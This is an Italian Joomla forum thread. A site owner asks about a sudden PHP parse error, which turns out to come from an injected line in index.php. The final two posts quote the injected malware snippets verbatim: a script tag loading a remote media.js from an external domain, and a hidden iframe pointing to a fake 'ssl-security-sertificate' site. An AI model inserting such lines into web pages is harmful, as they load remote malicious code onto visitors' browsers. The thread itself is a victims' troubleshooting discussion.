Back to top

Autore Topic: Errore Improvviso.. Parse error: syntax error, unexpected '<' in.....  (Letto 1928 volte)

Offline cleps

• Nuovo arrivato
  • *
    • Mostra profilo
Salve a tutti.. improvvisamente il sito che ho creato per una associazione sportiva ha smesso di funzionare e la pagina index.php da il seguente errore:

Parse error: syntax error, unexpected '<' in D:\Inetpub\webs\asddelnerait\joomla\index.php on line 88

cosa può essere successo?... ieri funzionava cioè... funzionava da un bel pò di mesi...

il link per il sito è il seguente: www.asddelnera.it

Grazie a tutti..

vamba

• Visitatore
Mmmm....... p
Premessa
Strano vedere siti con joomla installato, su quel servizio hosting, su server windows (da quanto ne so non le loro regole non o permetterebbero).

comunque.........
prova a ricaricare il file index.php in quanto è possibile che sia corrotto (la linea 88 è esattamente l'ultima di tale file e non comprende, di default, alcun tag < )

oppure, se hai la compressione gzip attivata, prova a disattivarla.

Offline loschi.andrea

• Esploratore
  • **
    • Mostra profilo
ATTENZIONE: mi sai che sei stato vittima di un attacco hacker.

Google Chrome ha rilevato la minaccia di un malware.

Ti conviene scaricarti via FTP il database MySQL e le immagini e rifare una nuova installazione (su un gestore hosting magari più sicuro).
Vota le mie foto su Panormario http://www.panoramio.com/user/loschi.andrea

Offline cleps

• Nuovo arrivato
  • *
    • Mostra profilo
capisco... adesso provo.. anche perchè il tutto si è verificato da un giorno all'altro senza aver effettuato modifiche di codice o altro.. :(

adesso farò qualche prova grazie

Offline cleps

• Nuovo arrivato
  • *
    • Mostra profilo
risolto tutto...
sia nella pagina index di joomla che in quella dell'administrator si era aggiunta una riga di codice (non so come) che puntava ad un link... il codice che era stato aggiunto è il seguente:

Codice: [Seleziona]
<html><body><script type="text/javascript" src="http://nl-cmp.cz.cc/media.js"> </script></body></html>
cancellando il codice da entrambe le pagine ho risolto il problemone.. ma come si può evitare questi casini.. forse devo impostare i due file index in non-scrivibile?

Offline wdo

• Nuovo arrivato
  • *
    • Mostra profilo
Buongiorno,
sono nuovo di questo forum e ultimamente un mio sito ha avuto lo stesso problema. Vi riporto  il codice che ho trovato sulla pagina index del mio sito:

Codice: [Seleziona]
echo JResponse::toString($mainframe->getCfg('gzip'));<html><body><iframe src='http://ssl-security-sertificate.com//' height=60 width=468 border=0 scrolling=no></iframe></body></html>
il sito si trova su hosting register ma da che cosa può dipendere?

La versione di joomla è la 1.5.23.

p.s. ho altri siti con la stessa versione che devo assolutissimamente aggiornare ma che non hanno mai avuto problemi simili.

Sarà l'hosting?

Grazie!!
Angelo
« Ultima modifica: 29 Feb 2012, 15:57:35 da wdo »

Web Design Bolzano Kreatif